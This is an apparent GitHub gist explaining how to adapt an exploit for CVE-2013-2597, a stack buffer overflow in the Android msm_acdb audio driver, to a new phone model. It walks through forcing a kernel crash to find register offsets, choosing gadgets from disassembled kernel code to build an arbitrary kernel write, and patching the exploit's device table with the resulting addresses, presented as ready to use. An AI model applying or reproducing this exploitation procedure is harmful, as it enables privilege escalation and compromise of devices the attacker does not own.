Created
July 28, 2013 04:42
-
-
Save fi01/6097436 to your computer and use it in GitHub Desktop.
Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| To use msm_acdb explot we need to work 4 steps. | |
| 1. Find how to run command with root or system previlege | |
| 2. Get offset for registers to setup | |
| 3. Choose proper code in kernel image | |
| 4. Setup parameters in acdb.c | |
| 1. Find how to run command with root or system previlege | |
| Do it your self. :-P | |
| 2. Get offset for registers to setup | |
| - Add dummy entry to get crach log. | |
| --- a/acdb.c | |
| +++ b/acdb.c | |
| @@ -43,6 +43,7 @@ static supported_device supported_devices[] = { | |
| { DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } }, | |
| { DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } }, | |
| { DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } }, | |
| + { DEVICE_SH05E_01_00_05, { 0, 0, { 0, 0}, { 0, 0} } }, | |
| { DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } }, | |
| { DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } }, | |
| { DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } }, | |
| - Build tool | |
| - Stop services to avoid lost data | |
| - Run tool with root or system previlege | |
| It will be reboot due to cause kernel panic. | |
| - See crash log | |
| (e.g. /proc/last_kmsg or log partition) | |
| <3>[ 348.770486] ACDB=> ACDB ioctl not found! | |
| <1>[ 348.770547] Unable to handle kernel NULL pointer dereference at virtual address 0000009c | |
| <1>[ 348.770608] pgd = df18c000 | |
| <1>[ 348.770639] [0000009c] *pgd=9b727831, *pte=00000000, *ppte=00000000 | |
| <0>[ 348.770700] Internal error: Oops: 80000007 [#1] PREEMPT SMP | |
| <4>[ 348.770761] Modules linked in: | |
| <4>[ 348.770791] CPU: 0 Not tainted (3.0.8 #1) | |
| <4>[ 348.770853] PC is at 0x9c | |
| <4>[ 348.770883] LR is at acdb_ioctl+0x740/0x860 | |
| <4>[ 348.770944] pc : [<0000009c>] lr : [<c0137658>] psr: 60000013 | |
| <4>[ 348.770944] sp : ce513f28 ip : 00000000 fp : 00000098 | |
| <4>[ 348.771005] r10: 00000094 r9 : 00000090 r8 : 0000008c | |
| <4>[ 348.771066] r7 : 00000088 r6 : 00000084 r5 : 00000080 r4 : 0000007c | |
| <4>[ 348.771097] r3 : 00000000 r2 : ce513e74 r1 : c0973db8 r0 : 00000000 | |
| <4>[ 348.771158] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user | |
| You'll found offset for register in buffer. | |
| R4 : 0x7c | |
| R5 : 0x80 | |
| R6 : 0x84 | |
| R7 : 0x88 | |
| R8 : 0x8c | |
| R9 : 0x90 | |
| R10: 0x94 | |
| R11: 0x98 | |
| PC : 0x9c | |
| - Disassemble do_vfs_ioctl and check return code | |
| c021d8fc: e2 8d d0 44 ADD SP, SP, #$44 | |
| c021d900: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC } | |
| You'll found add 0x44 bytes to SP and restore register R4-R9 and PC. | |
| 3. Choose proper code in kernel image | |
| - Choose code to write value and to end do_vfs_ioctl code from kernel image | |
| They should use same size on stack and restore same registers with do_vfs_ioctl like this: | |
| write code: use R9 as write address and R5 as write value, and use 0x20 bytes | |
| c0381b98: e5 89 50 00 STR R5, [R9] | |
| c0381b9c: e8 bd 87 f0 LDMUW [SP], { R4-R10, PC } | |
| end do_vfs_ioctl code: use 0x24 bytes (=0x44 - 0x20) and restore R4-R9 and PC | |
| c0231b98: e2 8d d0 24 ADD SP, SP, #$24 | |
| c0231b9c: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC } | |
| 4. Setup parameters in acdb.c | |
| - Setup parameters in acdb.c | |
| Write value is R5, offset = 0x80 | |
| Write address is R9, offset = 0x90 | |
| Write code is offset 0x9c and address = 0xc0381b98 | |
| End do_vfs_ioctl code is offset 0xbc (=0x9c + 0x20) and address = 0xc0231b98 | |
| --- a/acdb.c | |
| +++ b/acdb.c | |
| @@ -43,6 +43,7 @@ static supported_device supported_devices[] = { | |
| { DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } }, | |
| { DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } }, | |
| { DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } }, | |
| + { DEVICE_SH05E_01_00_05, { 0x80, 0x90, { 0x9c, 0xc0381b98 }, { 0xbc, 0xc0231b98} } }, | |
| { DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } }, | |
| { DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } }, | |
| { DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } }, | |
| That's all. Have fun!! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment